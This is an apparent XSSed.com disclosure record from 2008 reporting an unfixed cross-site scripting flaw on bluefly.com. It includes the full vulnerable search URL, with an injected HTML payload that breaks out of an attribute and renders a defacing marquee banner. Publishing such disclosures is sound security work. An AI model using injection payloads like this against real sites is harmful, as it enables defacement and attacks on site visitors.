Unfixed XSS vulnerability at bluefly.com

2008-03-25T00:00:00
ID XSSED:34511
Type xssed
Reporter holisticinfosec
Modified 2008-12-04T00:00:00

Description

Security researcher holisticinfosec submitted a cross-site scripting (XSS) vulnerability affecting bluefly.com on 25/03/2008. At the time of submission, the site ranked 7399 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://bluefly.com/pages/search/results.jsp;jsessionid=HobzrIuDooFLT816iLxdtGnDM7WKJS0Yi2cxSAoDccvh1uMrkUyV!-893005850!app19.l3.bluefly.com!7005!7002?cmSrch=true&Ne=500000&Ntk=all&Ntx=mode+matchallpartial&N=933&Ntt=test&FOLDER%3C%3Efolder_id=%22%3E%3Cmarquee%3E%3Ch%31%3EThis_site_is_NOT_Hacker_Safe%3C%2Fh%31%3E%3C%2Fmarquee%3E&inicat=933